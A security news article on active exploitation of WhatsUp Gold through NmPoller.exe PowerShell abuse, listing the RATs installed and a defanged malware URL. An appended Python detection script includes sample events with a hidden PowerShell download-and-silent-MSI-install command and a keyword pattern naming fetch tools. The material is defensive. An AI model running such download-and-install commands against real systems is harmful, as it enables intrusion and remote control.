Hackers Actively Exploiting Dangerous WhatsUp RCE Vulnerability

Remote code execution attacks on WhatsUp Gold exploited the Active Monitor PowerShell Script beginning August 30, leveraging vulnerabilities CVE-2024-6670 and CVE-2024-6671. Despite patches released on August 16, delayed application by some organizations led to immediate incidents following the PoC’s publication.

The attackers exploited NmPoller.exe to run PowerShell scripts and install remote access tools. To prevent this, enforce access controls on corporate services, apply patches promptly, and monitor for suspicious process activity in WhatsUp Gold environments.

A suspicious script from a malicious website was unexpectedly executed on the WhatsUp Gold server. Despite no previous signs of unauthorized access or malware activity, the incident likely indicates a system vulnerability that was exploited.

Execution profile for the abuse of NmPoller.exe

The WhatsUp Gold polling process, NmPoller.exe, was exploited to execute malicious PowerShell scripts, as threat actors abused the process’s ability to host scripts to remotely execute arbitrary code. 

The malicious code, consisting of a prefix and a malicious payload, was injected into the polling process; several variations of the injected code have been observed. NmPoller.exe then executed the malicious PowerShell scripts, downloading remote payloads and installing suspicious MSIs.

The threat actor tried to install Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote RATs on the target system using PowerShell and msiexec.exe. 

Execution profile for msiexec.exe installing Atera Agent and Splashtop Remote

A single MSI installer from hxxps://fedko[.]org/wp-includes/ID3/setup.msi installed Atera Agent and Splashtop Remote, which were identified as remote access tools (RATs). 

The MXDR team contained the incident and prevented further damage. The threat actor remains unidentified but is suspected to be associated with ransomware, given the use of multiple RATs.

The product vendor released a patch for the vulnerability on August 16, and a PoC was published on August 30. The rapid exploitation that followed was likely helped by the PoC's availability over a long weekend in the US, when many organizations might have had difficulty applying the patch promptly.

The recent patch, released prior to the PoC, addresses a high-severity vulnerability. Applying the patch proactively can mitigate risks, even without a public PoC. 

Censys reports 1,207 exposed devices online for CVE-2024-4885, a critical vulnerability fixed in June; this, along with other recent disclosures, may have heightened threat actor interest.

The spike of the number of events in the search results in the incident

Monitoring the nmpoller.exe process for suspicious process creation events can help detect potential attacks. The search query “nmpoller.exe” AND eventSubId:(2 OR 101 OR 109 OR 901) can be used in Vision One to detect potential security incidents related to WhatsUp Gold. 

By monitoring for unexpected events like product restarts, logfile creations, and spikes in event frequency, administrators can identify malicious activities such as external MSI package installations, RAT installations, and suspicious file creations. 

Additionally, monitoring PowerShell scripts executed by WhatsUp Gold’s Active Monitor PowerShell Script function can help prevent unauthorized code execution.
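The process-tree rule described above, written out as an added example (not code from the original article or from Trend Micro): it scans constructed process-creation records for script hosts or msiexec.exe spawned by NmPoller.exe and escalates those whose command line fetches a remote payload, installs an MSI, or runs an encoded command. The field names, sample events and risk keywords are assumptions to be tuned against your own baseline.

```python
import re
from typing import Optional

# Constructed sample process-creation events (hypothetical field names modelled on
# typical EDR/Sysmon telemetry, not real Vision One records or incident data).
SAMPLE_EVENTS = [
    {"ts": "2024-08-30T11:02:13Z",
     "parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri https://example.invalid/setup.msi -OutFile C:\Windows\Temp\setup.msi"'},
    {"ts": "2024-08-30T11:02:20Z",
     "parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Windows\Temp\setup.msi /qn"},
    {"ts": "2024-08-30T11:03:00Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe"},
    {"ts": "2024-08-30T11:05:41Z",
     "parent": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\check_disk.ps1"},
]

# Children NmPoller.exe should rarely spawn; baseline against your own Active Monitor
# scripts and tune these sets (assumption, not a vendor-supplied list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
INSTALLERS = {"msiexec.exe"}
# Fragments that escalate a finding: remote fetch, MSI install or encoded command.
HIGH_RISK = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|https?://|\.msi\b|/i\b|-enc\w*\s",
    re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> Optional[str]:
    """Return 'high', 'watch' or None for one process-creation event."""
    if basename(event["parent"]) != "nmpoller.exe":
        return None
    if basename(event["image"]) not in SCRIPT_HOSTS | INSTALLERS:
        return None
    return "high" if HIGH_RISK.search(event["cmd"]) else "watch"

def flag_suspicious(events) -> list:
    """(timestamp, child image, severity) for every event matching the abuse profile."""
    return [(e["ts"], basename(e["image"]), sev) for e in events if (sev := classify(e))]
```

A "watch" finding is a script host launched by the poller with no download or install indicators, which may be a legitimate Active Monitor script; a "high" finding reproduces the download-then-msiexec chain seen in this incident and should be triaged immediately.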

Kaaviya
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.
